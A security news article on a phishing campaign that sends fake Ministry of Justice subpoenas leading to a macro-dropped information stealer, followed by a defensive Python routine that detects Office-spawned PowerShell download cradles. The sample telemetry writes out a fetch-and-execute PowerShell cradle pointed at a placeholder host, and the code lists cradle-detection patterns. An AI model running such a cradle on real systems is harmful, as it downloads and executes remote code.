As workforces become better trained to spot phishing, attackers are getting more creative with their lures. The latest is to pose as the Ministry of Justice and send fake subpoenas to potential victims, in the hope that they will panic and act before checking the authenticity of the email.
Cofense Intelligence has spotted such emails going out to employees of insurance and retail companies. As one would expect, they closely imitate genuine correspondence from the ministry: the message tells the recipient that they have been subpoenaed and must click a link to see the details.
The first link points to a Google Docs document. The document itself carries no malicious code, so opening it does not infect the machine, but it is not harmless either: hosting the first hop on a trusted Google domain is what makes the email look legitimate to the victim. The Docs file is a staging page, and it contains a direct download link to a Word file sitting in a OneDrive folder.
That Word file carries a macro which, once the victim enables it (Office disables macros by default, so the lure still depends on the user clicking through the warning), launches PowerShell to download the malware.
The payload, Cofense says, is a capable information stealer. It harvests data from most web browsers in use today, including less popular ones, and looks for stored browser data, cryptocurrency wallet data, and FTP and email login credentials. It can also take screenshots of the infected machine.
Everything it collects is written to a file named information.log, which it then sends to its command-and-control server. The file name is a usable host-based indicator for this campaign, though it is trivial for the operators to change.
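The weak point in this chain, from a defender's view, is the step where a Word macro launches PowerShell to fetch the payload: Office applications almost never have a legitimate reason to spawn a command interpreter, and a download cradle on the PowerShell command line makes the pairing even more suspicious. The following is an added example, not code from the article or from Cofense: a small detection routine run over constructed, Sysmon-style process-creation events (the field names ParentImage, Image and CommandLine mirror Sysmon Event ID 1; the sample events, URLs and file paths are made up for illustration). It flags Office-spawned interpreters, scans the command line for common download cradles, and decodes a -EncodedCommand argument (base64 of UTF-16LE) so that obfuscated cradles are caught as well.

```python
import base64
import re
from typing import Dict, List, Optional

# Office binaries that have no business launching a command interpreter,
# and the interpreters a malicious macro typically reaches for.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments that mark a PowerShell download cradle or in-memory execution.
CRADLE_PATTERNS = {
    "DownloadString": re.compile(r"downloadstring", re.I),
    "DownloadFile": re.compile(r"downloadfile", re.I),
    "Net.WebClient": re.compile(r"net\.webclient", re.I),
    "Invoke-WebRequest": re.compile(r"invoke-webrequest|\biwr\b", re.I),
    "Start-BitsTransfer": re.compile(r"start-bitstransfer", re.I),
    "Invoke-Expression": re.compile(r"invoke-expression|\biex\b", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    """Lower-case file name from a Windows (or POSIX) path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: Dict[str, str]) -> List[str]:
    """Reasons an Office-spawned process-creation event looks like a macro dropper.
    Returns an empty list when the event is not an Office -> interpreter chain."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent not in OFFICE_PARENTS or image not in SHELLS:
        return []
    reasons = [f"{parent} spawned {image}"]
    # Scan the visible command line and, where present, the decoded -EncodedCommand payload.
    texts = [cmd]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command decoded")
        texts.append(decoded)
    for text in texts:
        for name, pat in CRADLE_PATTERNS.items():
            tag = f"cradle: {name}"
            if pat.search(text) and tag not in reasons:
                reasons.append(tag)
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    return reasons


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyse_event over a batch and return only the flagged events with their reasons."""
    flagged = []
    for i, ev in enumerate(events):
        reasons = analyse_event(ev)
        if reasons:
            flagged.append({"index": i, "image": basename(ev.get("Image", "")), "reasons": reasons})
    return flagged


# Constructed sample telemetry (not real captures). Event 0 mirrors the chain in the
# article: Word spawning PowerShell with a hidden window and a DownloadString cradle.
# Event 3 hides the cradle behind -EncodedCommand ("SQBFAFgA" is "IEX" in UTF-16LE base64).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/payload.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\splwow64.exe",          # benign Word child (print helper)
     "CommandLine": "splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -EncodedCommand SQBFAFgA"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["index"], hit["image"], "; ".join(hit["reasons"]))
```

The parent/child check alone is the high-value signal; the cradle and encoding checks mainly serve to raise severity and to surface the payload URL for blocking. In a real environment the same logic maps directly onto a SIEM or EDR rule on process-creation events, with the Office parent list extended to whatever Office binaries are deployed.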